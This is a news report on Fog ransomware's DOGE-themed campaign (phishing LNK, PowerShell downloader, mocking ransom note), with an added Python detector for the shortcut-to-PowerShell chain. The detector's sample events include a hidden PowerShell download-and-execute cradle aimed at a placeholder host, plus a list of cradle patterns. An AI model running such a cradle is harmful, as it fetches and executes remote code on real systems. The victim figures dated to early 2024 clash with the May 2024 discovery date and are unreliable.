Fog ransomware operators have recently introduced a new tactic in their attacks by using DOGE-themed ransom notes. These notes mock victims and offer a free decryption key in exchange for spreading the malware to others.
Unlike previous campaigns where Fog relied on compromised VPN credentials for access, the latest wave of attacks begins with phishing emails containing a zip archive named “Pay Adjustment.zip.” Inside this archive is a malicious LNK file. Once clicked, the file triggers a series of actions that lead to the installation of the ransomware on the system, according to researchers at Trend Micro, who uncovered the campaign.
Fog Ransomware is Expanding Victim Count
Trend Micro’s analysis revealed that Fog ransomware has already impacted 100 victims since January 2024, with February seeing the highest number of incidents (53 victims). Since June, the researchers have identified 173 instances of ransomware activity linked to Fog among Trend Micro customers. The sectors most affected include technology, manufacturing, education, and transportation.
The analysis showed that the malicious LNK file triggers a PowerShell script, which then retrieves a ransomware downloader, along with several other PowerShell scripts and executables. These scripts are designed to gather hardware and system information, facilitate lateral movement across networks, and display a QR code for victims to use when paying the ransom to a Monero wallet address. The script also opens politically themed YouTube videos and includes political commentary.
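The delivery chain described above (an archived LNK that launches PowerShell, which in turn fetches the downloader and further scripts) leaves a characteristic process-creation trail that endpoint telemetry can pick up. The following is an added detection example, not code from Trend Micro or from this article: it scans process-creation events for PowerShell spawned directly by explorer.exe out of a temporary extraction folder, or carrying a download cradle on its command line. The event schema, the pattern lists and the sample events are all constructed for illustration; the URL and file names in them are placeholders, not indicators from the campaign.

```python
"""Heuristic detection of an archived-shortcut -> PowerShell -> downloader chain.

Input: process-creation events of the kind an EDR or Sysmon sensor emits.
The ProcEvent schema and all sample values are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-case executable basename
    cmdline: str
    cwd: str        # working directory at launch


# Common download-cradle and encoded-payload markers (assumed list, not from the article).
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"start-bitstransfer", r"-encodedcommand", r"\s-enc?\s", r"\s-e\s",
    r"frombase64string", r"invoke-expression", r"\biex\b",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)

# Where a double-clicked archived shortcut usually runs from: Explorer's temporary
# zip extraction folder (Temp<N>_<archive>), Downloads, or Outlook's attachment cache.
SUSPICIOUS_DIR_RE = re.compile(
    r"(\\appdata\\local\\temp\\|\\downloads\\|content\.outlook\\|temp\d*_)",
    re.IGNORECASE,
)

POWERSHELL = {"powershell.exe", "pwsh.exe"}


def score_event(ev: ProcEvent, by_pid: dict) -> list:
    """Return the matched indicators for one event; an empty list means no alert."""
    if ev.image not in POWERSHELL:
        return []
    parent = by_pid.get(ev.ppid)
    from_explorer = parent is not None and parent.image == "explorer.exe"
    susp_dir = bool(SUSPICIOUS_DIR_RE.search(ev.cwd) or SUSPICIOUS_DIR_RE.search(ev.cmdline))
    cradle = bool(CRADLE_RE.search(ev.cmdline))

    reasons = []
    if from_explorer:
        reasons.append("powershell spawned directly by explorer.exe (shortcut double-click)")
    if susp_dir:
        reasons.append("launched from a temp/download/extraction directory")
    if cradle:
        reasons.append("command line contains a download cradle or encoded payload")

    # Explorer-parented PowerShell alone is routine (users run scripts), so require
    # at least one corroborating signal before alerting.
    return reasons if from_explorer and (susp_dir or cradle) else []


def detect(events: Iterable[ProcEvent]) -> dict:
    """Map pid -> reasons for every event that trips the heuristic."""
    events = list(events)
    by_pid = {e.pid: e for e in events}
    return {e.pid: r for e in events if (r := score_event(e, by_pid))}


# Constructed sample telemetry (placeholder paths and URL, not real indicators).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", "C:\\Windows\\explorer.exe", "C:\\Windows"),
    # Benign: admin runs a local script from Explorer; no cradle, no temp folder.
    ProcEvent(2000, 1000, "powershell.exe",
              "powershell.exe -File C:\\Scripts\\inventory.ps1", "C:\\Scripts"),
    # Suspicious: shortcut inside an extracted archive runs a hidden download cradle.
    ProcEvent(3000, 1000, "powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://placeholder.invalid/stage1')\"",
              "C:\\Users\\jdoe\\AppData\\Local\\Temp\\Temp1_Pay Adjustment.zip"),
    # Encoded command but parented by an unknown process: outside this rule's scope.
    ProcEvent(3100, 2500, "powershell.exe", "powershell.exe -enc AAAA", "C:\\Users\\jdoe"),
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(f"pid {pid}:")
        for r in reasons:
            print(f"  - {r}")
```

The rule deliberately keys on the explorer.exe parent plus a corroborating signal rather than on the archive name, since the lure file name changes between campaigns while the launch mechanics do not; tune the directory and cradle lists to the host environment before deploying.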
The DOGE-Themed Ransom Note
The ransom note that victims receive contains references to DOGE (Department of Government Efficiency), often humorously linking it to Elon Musk and other individuals at DOGE. The note humorously asks victims to list five tasks they’ve accomplished in the past week or pay a ransom amount of one trillion dollars.
In a postscript, the attacker offers the victim a free decryption key if they share the malware with someone else, adding a menacing line: “Don’t snitch now.” It also claims that the victim’s “trilatitude” and “trilongtitude” (a fictional measure) coordinates have been captured.
Fog ransomware was first identified in May 2024 by Arctic Wolf, which initially detected it targeting educational institutions in the U.S. The attacks began with the use of compromised VPN gateway credentials, allowing attackers to quickly encrypt valuable data on the victim network. Unlike other ransomware families, Fog operators initially did not exfiltrate data or operate a leak site, suggesting a focus on fast payouts.
However, recent activities tracked by Darktrace indicate that the threat actors behind Fog have shifted their approach. Now, the operators are employing double-extortion tactics—stealing data before deploying the ransomware to increase pressure on victims. In at least one observed attack, Fog encrypted data on a victim’s network in under two hours after initial access.
A Growing Threat
Trend Micro’s researchers caution that Fog ransomware is a growing threat that enterprises should be vigilant about. While the malware’s origins and motivations remain unclear, its potential for financial loss and operational disruption is significant. Whether the operators are using DOGE references for trolling or impersonating other actors, a successful Fog attack could have serious consequences for an organization.
To protect against Fog ransomware, Trend Micro has published indicators of compromise (IoCs) for monitoring its activity. Additionally, they recommend standard ransomware defense measures, such as maintaining secure backups of critical data, regularly testing restoration processes, segmenting networks, updating software, and training employees to recognize phishing and social engineering attacks.